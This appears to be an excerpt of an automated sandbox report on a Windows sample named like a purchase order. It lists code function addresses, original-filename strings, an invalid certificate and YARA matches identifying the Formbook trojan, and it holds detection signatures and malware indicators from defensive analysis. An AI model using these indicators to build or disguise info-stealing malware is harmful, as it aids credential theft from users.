Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE01AA	9_2_01AE01AA
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD41A2	9_2_01AD41A2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD81CC	9_2_01AD81CC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10100	9_2_01A10100
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABA118	9_2_01ABA118
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA8158	9_2_01AA8158
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB2000	9_2_01AB2000
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE03E6	9_2_01AE03E6
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E3F0	9_2_01A2E3F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADA352	9_2_01ADA352
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA02C0	9_2_01AA02C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE0591	9_2_01AE0591
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACE4F6	9_2_01ACE4F6
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC4420	9_2_01AC4420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD2446	9_2_01AD2446
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1C7C0	9_2_01A1C7C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A44750	9_2_01A44750
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3C6E0	9_2_01A3C6E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AEA9A6	9_2_01AEA9A6
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A36962	9_2_01A36962
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A068B8	9_2_01A068B8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E8F0	9_2_01A4E8F0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A22840	9_2_01A22840
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2A840	9_2_01A2A840
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD6BD7	9_2_01AD6BD7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADAB40	9_2_01ADAB40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1EA80	9_2_01A1EA80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A38DBF	9_2_01A38DBF
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1ADE0	9_2_01A1ADE0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2AD00	9_2_01A2AD00
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABCD1F	9_2_01ABCD1F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0CB5	9_2_01AC0CB5
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10CF2	9_2_01A10CF2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20C00	9_2_01A20C00
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9EFA0	9_2_01A9EFA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2CFE0	9_2_01A2CFE0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A12FC8	9_2_01A12FC8
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A62F28	9_2_01A62F28
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A40F30	9_2_01A40F30
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC2F30	9_2_01AC2F30
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A94F40	9_2_01A94F40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A32E90	9_2_01A32E90
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADCE93	9_2_01ADCE93
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADEEDB	9_2_01ADEEDB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADEE26	9_2_01ADEE26
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20E59	9_2_01A20E59
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2B1B0	9_2_01A2B1B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AEB16B	9_2_01AEB16B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A5516C	9_2_01A5516C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0F172	9_2_01A0F172
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD70E9	9_2_01AD70E9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADF0E0	9_2_01ADF0E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACF0CC	9_2_01ACF0CC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A270C0	9_2_01A270C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A6739A	9_2_01A6739A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD132D	9_2_01AD132D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0D34C	9_2_01A0D34C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A252A0	9_2_01A252A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC12ED	9_2_01AC12ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3B2C0	9_2_01A3B2C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABD5B0	9_2_01ABD5B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD7571	9_2_01AD7571
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADF43F	9_2_01ADF43F
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A11460	9_2_01A11460
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADF7B0	9_2_01ADF7B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD16CC	9_2_01AD16CC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB5910	9_2_01AB5910
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A29950	9_2_01A29950
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3B950	9_2_01A3B950
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A238E0	9_2_01A238E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8D800	9_2_01A8D800
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3FB80	9_2_01A3FB80
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A95BF0	9_2_01A95BF0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A5DBF9	9_2_01A5DBF9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADFB76	9_2_01ADFB76
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A65AA0	9_2_01A65AA0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ABDAAC	9_2_01ABDAAC
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC1AA3	9_2_01AC1AA3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACDAC6	9_2_01ACDAC6
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A93A6C	9_2_01A93A6C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADFA49	9_2_01ADFA49
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD7A46	9_2_01AD7A46
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3FDC0	9_2_01A3FDC0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD7D73	9_2_01AD7D73
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A23D40	9_2_01A23D40
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD1D5A	9_2_01AD1D5A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADFCF2	9_2_01ADFCF2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A99C32	9_2_01A99C32
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADFFB1	9_2_01ADFFB1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A21F92	9_2_01A21F92
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADFF09	9_2_01ADFF09
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A29EB0	9_2_01A29EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_0E078232	10_2_0E078232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E072B32	10_2_0E072B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0E072B30	10_2_0E072B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0E077036	10_2_0E077036
Source: C:\Windows\explorer.exe	Code function: 10_2_0E06E082	10_2_0E06E082
Source: C:\Windows\explorer.exe	Code function: 10_2_0E06FD02	10_2_0E06FD02
Source: C:\Windows\explorer.exe	Code function: 10_2_0E075912	10_2_0E075912
Source: C:\Windows\explorer.exe	Code function: 10_2_0E07B5CD	10_2_0E07B5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3FD232	10_2_0E3FD232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3F7B32	10_2_0E3F7B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3F7B30	10_2_0E3F7B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3FC036	10_2_0E3FC036
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3F3082	10_2_0E3F3082
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3FA912	10_2_0E3FA912
Source: C:\Windows\explorer.exe	Code function: 10_2_0E3F4D02	10_2_0E3F4D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0E4005CD	10_2_0E4005CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8EE232	10_2_0F8EE232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8F15CD	10_2_0F8F15CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8E5D02	10_2_0F8E5D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8EB912	10_2_0F8EB912
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8E8B32	10_2_0F8E8B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8E8B30	10_2_0F8E8B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8E4082	10_2_0F8E4082
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8ED036	10_2_0F8ED036
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0114D304	11_2_0114D304
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514D070	11_2_0514D070
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514C578	11_2_0514C578
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514C568	11_2_0514C568
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514D060	11_2_0514D060
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514BF3F	11_2_0514BF3F
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514BF78	11_2_0514BF78
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0514BF67	11_2_0514BF67
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_07296E18	11_2_07296E18
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_07294D38	11_2_07294D38
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_07296530	11_2_07296530
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_07296540	11_2_07296540
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_072944C8	11_2_072944C8
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0729CB08	11_2_0729CB08
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_07294900	11_2_07294900
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041E040	16_2_0041E040
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00401030	16_2_00401030
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D9F1	16_2_0041D9F1
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041E273	16_2_0041E273
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041ED6F	16_2_0041ED6F
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041E57B	16_2_0041E57B
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00402D87	16_2_00402D87
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00402D90	16_2_00402D90
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D5A3	16_2_0041D5A3
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D5A6	16_2_0041D5A6
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00409E60	16_2_00409E60
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041DE2E	16_2_0041DE2E
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041DF42	16_2_0041DF42
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041E7DC	16_2_0041E7DC
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00402FB0	16_2_00402FB0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F66000	16_2_00F66000
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F10100	16_2_00F10100
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00FA02C0	16_2_00FA02C0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2E3F0	16_2_00F2E3F0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F765D0	16_2_00F765D0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F765B2	16_2_00F765B2
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F20535	16_2_00F20535
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F3C6E0	16_2_00F3C6E0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F20770	16_2_00F20770
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F44750	16_2_00F44750
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F128F0	16_2_00F128F0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F068F1	16_2_00F068F1
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F4E8F0	16_2_00F4E8F0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F58890	16_2_00F58890
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2A840	16_2_00F2A840
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F36962	16_2_00F36962
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F1EA80	16_2_00F1EA80
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F22A45	16_2_00F22A45
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F10CF2	16_2_00F10CF2
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F20C00	16_2_00F20C00
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F28DC0	16_2_00F28DC0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F38DBF	16_2_00F38DBF
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2ED7A	16_2_00F2ED7A
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2AD00	16_2_00F2AD00
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F32ED9	16_2_00F32ED9
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F20E59	16_2_00F20E59
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F12FC8	16_2_00F12FC8
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F9EFA0	16_2_00F9EFA0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F94F40	16_2_00F94F40
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F40F30	16_2_00F40F30
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F62F28	16_2_00F62F28
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2B1B0	16_2_00F2B1B0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F0F172	16_2_00F0F172
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F5516C	16_2_00F5516C
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F3D2F0	16_2_00F3D2F0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F252A0	16_2_00F252A0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F233F3	16_2_00F233F3
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F674E0	16_2_00F674E0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F23497	16_2_00F23497
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F2B730	16_2_00F2B730
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F238E0	16_2_00F238E0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F8D800	16_2_00F8D800
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F259DA	16_2_00F259DA
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F11979	16_2_00F11979
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F29950	16_2_00F29950
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F3B950	16_2_00F3B950
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F93A6C	16_2_00F93A6C
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F95BF0	16_2_00F95BF0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F5DBF9	16_2_00F5DBF9
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F3FB80	16_2_00F3FB80
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F99C32	16_2_00F99C32
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F39C20	16_2_00F39C20
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F3FDC0	16_2_00F3FDC0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F23D40	16_2_00F23D40
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F29EB0	16_2_00F29EB0
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F21F92	16_2_00F21F92

Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: String function: 00F67E54 appears 97 times
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: String function: 00F8EA12 appears 37 times
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: String function: 01A9F290 appears 105 times
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: String function: 01A55130 appears 58 times
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: String function: 01A67E54 appears 102 times
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: String function: 01A0B970 appears 280 times
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: String function: 01A8EA12 appears 86 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3040

Source: po8909893299832.exe

Static PE information: invalid certificate

Source: po8909893299832.exe, 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs po8909893299832.exe
Source: po8909893299832.exe, 00000000.00000002.1451860297.0000000004D80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs po8909893299832.exe
Source: po8909893299832.exe, 00000000.00000002.1447751241.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs po8909893299832.exe
Source: po8909893299832.exe, 00000000.00000002.1445416569.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs po8909893299832.exe
Source: po8909893299832.exe, 00000000.00000000.1397058006.00000000000C8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehovp.exe0 vs po8909893299832.exe
Source: po8909893299832.exe, 00000000.00000002.1452496786.0000000006B10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs po8909893299832.exe
Source: po8909893299832.exe, 00000009.00000002.1499697457.00000000035E0000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs po8909893299832.exe
Source: po8909893299832.exe, 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs po8909893299832.exe
Source: po8909893299832.exe	Binary or memory string: OriginalFilenamehovp.exe0 vs po8909893299832.exe

Source: po8909893299832.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
